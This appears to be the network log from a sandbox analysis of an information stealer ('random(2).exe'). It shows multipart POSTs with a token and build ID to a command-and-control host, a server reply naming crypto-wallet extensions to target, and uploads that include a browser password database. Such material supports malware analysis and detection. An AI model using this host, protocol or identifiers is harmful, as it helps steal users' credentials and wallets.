2025-03-19 13:00:20 UTC	332	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 61 73 32 36 38 79 75 6b 66 75 73 72 71 71 39 72 69 6d 37 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 64 62 39 34 61 64 38 38 35 34 63 34 62 34 62 34 38 63 37 63 38 65 34 66 36 62 62 33 36 38 38 0d 0a 2d 2d 2d 2d 2d 2d 61 73 32 36 38 79 75 6b 66 75 73 72 71 71 39 72 69 6d 37 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 30 36 32 31 61 66 34 39 34 37 66 36 66 37 38 30 30 38 36 35 61 35 63 38 30 64 38 66 33 32 39 0d 0a 2d 2d 2d 2d 2d 2d 61 73 32 36 38 79 75 6b 66 75 73 72 71 71 39 72 69 6d 37 39 0d 0a 43 6f 6e 74 Data Ascii: ------as268yukfusrqq9rim79Content-Disposition: form-data; name="token"5db94ad8854c4b4b48c7c8e4f6bb3688------as268yukfusrqq9rim79Content-Disposition: form-data; name="build_id"80621af4947f6f7800865a5c80d8f329------as268yukfusrqq9rim79Cont
2025-03-19 13:00:20 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 19 Mar 2025 13:00:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2025-03-19 13:00:20 UTC	119	IN	Data Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.10	49694	78.47.63.132	443	6980	C:\Users\user\Desktop\random(2).exe

Timestamp	Bytes transferred	Direction	Data
2025-03-19 13:00:27 UTC	272	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----ba168gln7qieuaaiwbi5 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:135.0) Firefox/135.0 Host: y.p.formaxprime.co.uk Content-Length: 5721 Connection: Keep-Alive Cache-Control: no-cache
2025-03-19 13:00:27 UTC	5721	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 62 61 31 36 38 67 6c 6e 37 71 69 65 75 61 61 69 77 62 69 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 64 62 39 34 61 64 38 38 35 34 63 34 62 34 62 34 38 63 37 63 38 65 34 66 36 62 62 33 36 38 38 0d 0a 2d 2d 2d 2d 2d 2d 62 61 31 36 38 67 6c 6e 37 71 69 65 75 61 61 69 77 62 69 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 30 36 32 31 61 66 34 39 34 37 66 36 66 37 38 30 30 38 36 35 61 35 63 38 30 64 38 66 33 32 39 0d 0a 2d 2d 2d 2d 2d 2d 62 61 31 36 38 67 6c 6e 37 71 69 65 75 61 61 69 77 62 69 35 0d 0a 43 6f 6e 74 Data Ascii: ------ba168gln7qieuaaiwbi5Content-Disposition: form-data; name="token"5db94ad8854c4b4b48c7c8e4f6bb3688------ba168gln7qieuaaiwbi5Content-Disposition: form-data; name="build_id"80621af4947f6f7800865a5c80d8f329------ba168gln7qieuaaiwbi5Cont
2025-03-19 13:00:28 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 19 Mar 2025 13:00:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2025-03-19 13:00:28 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.10	49699	78.47.63.132	443	6980	C:\Users\user\Desktop\random(2).exe

Timestamp	Bytes transferred	Direction	Data
2025-03-19 13:02:15 UTC	271	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----phlnglxt268gvasr1djw User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:135.0) Firefox/135.0 Host: y.p.formaxprime.co.uk Content-Length: 489 Connection: Keep-Alive Cache-Control: no-cache
2025-03-19 13:02:15 UTC	489	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 70 68 6c 6e 67 6c 78 74 32 36 38 67 76 61 73 72 31 64 6a 77 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 64 62 39 34 61 64 38 38 35 34 63 34 62 34 62 34 38 63 37 63 38 65 34 66 36 62 62 33 36 38 38 0d 0a 2d 2d 2d 2d 2d 2d 70 68 6c 6e 67 6c 78 74 32 36 38 67 76 61 73 72 31 64 6a 77 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 30 36 32 31 61 66 34 39 34 37 66 36 66 37 38 30 30 38 36 35 61 35 63 38 30 64 38 66 33 32 39 0d 0a 2d 2d 2d 2d 2d 2d 70 68 6c 6e 67 6c 78 74 32 36 38 67 76 61 73 72 31 64 6a 77 0d 0a 43 6f 6e 74 Data Ascii: ------phlnglxt268gvasr1djwContent-Disposition: form-data; name="token"5db94ad8854c4b4b48c7c8e4f6bb3688------phlnglxt268gvasr1djwContent-Disposition: form-data; name="build_id"80621af4947f6f7800865a5c80d8f329------phlnglxt268gvasr1djwCont
2025-03-19 13:02:16 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 19 Mar 2025 13:02:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2025-03-19 13:02:16 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.10	49700	78.47.63.132	443	6980	C:\Users\user\Desktop\random(2).exe

Timestamp	Bytes transferred	Direction	Data
2025-03-19 13:02:16 UTC	274	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----5xbaimgln7qim7yctjwl User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:135.0) Firefox/135.0 Host: y.p.formaxprime.co.uk Content-Length: 262605 Connection: Keep-Alive Cache-Control: no-cache
2025-03-19 13:02:16 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 35 78 62 61 69 6d 67 6c 6e 37 71 69 6d 37 79 63 74 6a 77 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 64 62 39 34 61 64 38 38 35 34 63 34 62 34 62 34 38 63 37 63 38 65 34 66 36 62 62 33 36 38 38 0d 0a 2d 2d 2d 2d 2d 2d 35 78 62 61 69 6d 67 6c 6e 37 71 69 6d 37 79 63 74 6a 77 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 30 36 32 31 61 66 34 39 34 37 66 36 66 37 38 30 30 38 36 35 61 35 63 38 30 64 38 66 33 32 39 0d 0a 2d 2d 2d 2d 2d 2d 35 78 62 61 69 6d 67 6c 6e 37 71 69 6d 37 79 63 74 6a 77 6c 0d 0a 43 6f 6e 74 Data Ascii: ------5xbaimgln7qim7yctjwlContent-Disposition: form-data; name="token"5db94ad8854c4b4b48c7c8e4f6bb3688------5xbaimgln7qim7yctjwlContent-Disposition: form-data; name="build_id"80621af4947f6f7800865a5c80d8f329------5xbaimgln7qim7yctjwlCont
2025-03-19 13:02:16 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-03-19 13:02:16 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-03-19 13:02:16 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-03-19 13:02:16 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-03-19 13:02:16 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-03-19 13:02:16 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-03-19 13:02:16 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-03-19 13:02:16 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-03-19 13:02:16 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-03-19 13:02:18 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 19 Mar 2025 13:02:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.10	49701	78.47.63.132	443	6980	C:\Users\user\Desktop\random(2).exe

Timestamp	Bytes transferred	Direction	Data
2025-03-19 13:02:17 UTC	273	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----y5fctr1d2dtrqqimgvas User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:135.0) Firefox/135.0 Host: y.p.formaxprime.co.uk Content-Length: 55081 Connection: Keep-Alive Cache-Control: no-cache
2025-03-19 13:02:17 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 79 35 66 63 74 72 31 64 32 64 74 72 71 71 69 6d 67 76 61 73 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 64 62 39 34 61 64 38 38 35 34 63 34 62 34 62 34 38 63 37 63 38 65 34 66 36 62 62 33 36 38 38 0d 0a 2d 2d 2d 2d 2d 2d 79 35 66 63 74 72 31 64 32 64 74 72 71 71 69 6d 67 76 61 73 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 30 36 32 31 61 66 34 39 34 37 66 36 66 37 38 30 30 38 36 35 61 35 63 38 30 64 38 66 33 32 39 0d 0a 2d 2d 2d 2d 2d 2d 79 35 66 63 74 72 31 64 32 64 74 72 71 71 69 6d 67 76 61 73 0d 0a 43 6f 6e 74 Data Ascii: ------y5fctr1d2dtrqqimgvasContent-Disposition: form-data; name="token"5db94ad8854c4b4b48c7c8e4f6bb3688------y5fctr1d2dtrqqimgvasContent-Disposition: form-data; name="build_id"80621af4947f6f7800865a5c80d8f329------y5fctr1d2dtrqqimgvasCont
2025-03-19 13:02:17 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-03-19 13:02:17 UTC	16355	OUT	Data Raw: 43 42 4a 54 6c 52 46 52 30 56 53 4c 43 42 7a 61 47 46 79 61 57 35 6e 58 32 35 76 64 47 6c 6d 61 57 4e 68 64 47 6c 76 62 6c 39 6b 61 58 4e 77 62 47 46 35 5a 57 51 67 53 55 35 55 52 55 64 46 55 69 42 4f 54 31 51 67 54 6c 56 4d 54 43 42 45 52 55 5a 42 56 55 78 55 49 44 41 73 49 47 74 6c 65 57 4e 6f 59 57 6c 75 58 32 6c 6b 5a 57 35 30 61 57 5a 70 5a 58 49 67 51 6b 78 50 51 69 77 67 63 32 56 75 5a 47 56 79 58 33 42 79 62 32 5a 70 62 47 56 66 61 57 31 68 5a 32 56 66 64 58 4a 73 49 46 5a 42 55 6b 4e 49 51 56 49 73 49 46 56 4f 53 56 46 56 52 53 41 6f 62 33 4a 70 5a 32 6c 75 58 33 56 79 62 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 5a 57 78 6c 62 57 56 75 64 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 64 6d 46 73 64 57 55 73 49 48 42 68 63 33 4e 33 62 33 4a 6b Data Ascii: CBJTlRFR0VSLCBzaGFyaW5nX25vdGlmaWNhdGlvbl9kaXNwbGF5ZWQgSU5URUdFUiBOT1QgTlVMTCBERUZBVUxUIDAsIGtleWNoYWluX2lkZW50aWZpZXIgQkxPQiwgc2VuZGVyX3Byb2ZpbGVfaW1hZ2VfdXJsIFZBUkNIQVIsIFVOSVFVRSAob3JpZ2luX3VybCwgdXNlcm5hbWVfZWxlbWVudCwgdXNlcm5hbWVfdmFsdWUsIHBhc3N3b3Jk
